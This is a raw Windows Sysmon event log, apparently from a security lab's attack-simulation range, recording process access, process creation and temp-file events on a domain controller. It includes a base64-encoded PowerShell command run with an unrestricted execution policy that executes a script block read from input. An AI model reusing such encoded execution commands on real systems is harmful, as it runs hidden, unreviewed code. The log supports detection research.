08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-1679-5F84-0403-000000007E01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1679-5F84-0203-000000007E01}43082040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-1679-5F84-0403-000000007E01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c19a9|UNKNOWN(00007FF9E2E8B68F) 154100x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.582{5D479F2C-1679-5F84-0403-000000007E01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\taervu2d.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1678-5F84-7C8C-110000000000}0x118c7c0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.571{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\taervu2d.cmdline2020-10-12 08:40:25.571 11241100x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localDLL2020-10-12 08:40:25.571{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\taervu2d.dll2020-10-12 08:40:25.571 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1678-5F84-FF02-000000007E01}47564000C:\Windows\system32\conhost.exe{5D479F2C-1679-5F84-0303-000000007E01}4712C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-1679-5F84-0303-000000007E01}4712C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.133{5D479F2C-1679-5F84-0203-000000007E01}43082040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-1679-5F84-0303-000000007E01}4712C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|UNKNOWN(00007FFA3698331B)|UNKNOWN(00007FFA35E241A5)|UNKNOWN(00007FFA35E23E76)|UNKNOWN(00007FFA368D54DB)|UNKNOWN(00007FFA35DE4A0C)|UNKNOWN(00007FFA35E42EDB)|UNKNOWN(00007FFA35E26540)|UNKNOWN(00007FFA35E26540)|UNKNOWN(00007FFA35E263D1)|UNKNOWN(00007FFA35E18356)|UNKNOWN(00007FFA35E24889)|UNKNOWN(00007FFA35E2447C)|UNKNOWN(00007FFA35E241A5)|UNKNOWN(00007FFA35E23E76)|UNKNOWN(00007FFA368D54DB)|UNKNOWN(00007FFA35E0ACD7)|UNKNOWN(00007FFA35E0A2A7) 154100x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.135{5D479F2C-1679-5F84-0303-000000007E01}4712C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1678-5F84-7C8C-110000000000}0x118c7c0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.118{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.118{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.118{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.071{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 